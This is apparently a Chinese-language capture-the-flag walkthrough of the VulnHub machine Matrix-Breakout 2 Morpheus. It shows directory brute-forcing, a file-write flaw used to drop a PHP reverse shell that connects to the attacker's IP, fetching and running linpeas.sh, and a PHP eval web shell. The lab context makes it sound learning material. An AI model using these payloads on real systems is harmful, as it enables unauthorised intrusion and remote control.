靶机搭建:vulnhub上是说vbox里更合适。可能有vbox版本兼容问题,我用的vmware导入。
靶场下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
网络模式:桥接。
一:信息收集
2;访问端口信息。三位一体不会玩。
3;目录爆破一下,继续寻找。
4;文件爆破一下,
ffuf -u http://192.168.1.35/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
5;输入消息的地方好像有bug。试试。发布的东西被记录到txt文件里了。
二:漏洞利用。
1;burp抓包看一下数据包,
这里是一个file变量,改变file变量可以直接对靶机文件修改,能随意创建文件。准备反弹shell。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.34/8888 0>&1'"); ?>
2;监听成功。
3;发现一个txt的文件。提示,和一张图片。
www-data@morpheus:/$ ls -al
要找到cypher的密码!!
4;访问一下图片,把图片复制到kali里面去,可能藏着东西喔。
复制不了的,也可以下载。
wget http://192.168.1.35/.cypher-neo.png
binwalk -w cypher-neo.png
binwalk -e cypher-neo.png --run-as=root
换这个工具查看隐藏信息,然后提取出来,然后提示我们加--run-as=root,之后目录下会多个目录,
zlib这个提取不太会,就换个方式吧!等哪天有大佬从这儿解了,我再来更新学习吧!
https://www.cnblogs.com/ainsliaea/p/15780903.html
https://blog.csdn.net/qq_40574571/article/details/80164981
5:传信息收集的工具上去,
python3 -m http.server 8000
wget http://192.168.1.34:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
这里我们用这个:
到这的话我们就提权成功了。前面让我们找到cypher的密码,zlib不会提取,试试爆破!家目录下有个flag。
python3 -c 'import pty; pty.spawn("/bin/bash")' 把权限变成交互式shell。
没爆破出来!
也可以写个马,连接蚁剑看看文件里面有没有什么信息。
<?php eval(@$_POST['password']);?>
四:总结
1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。
2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。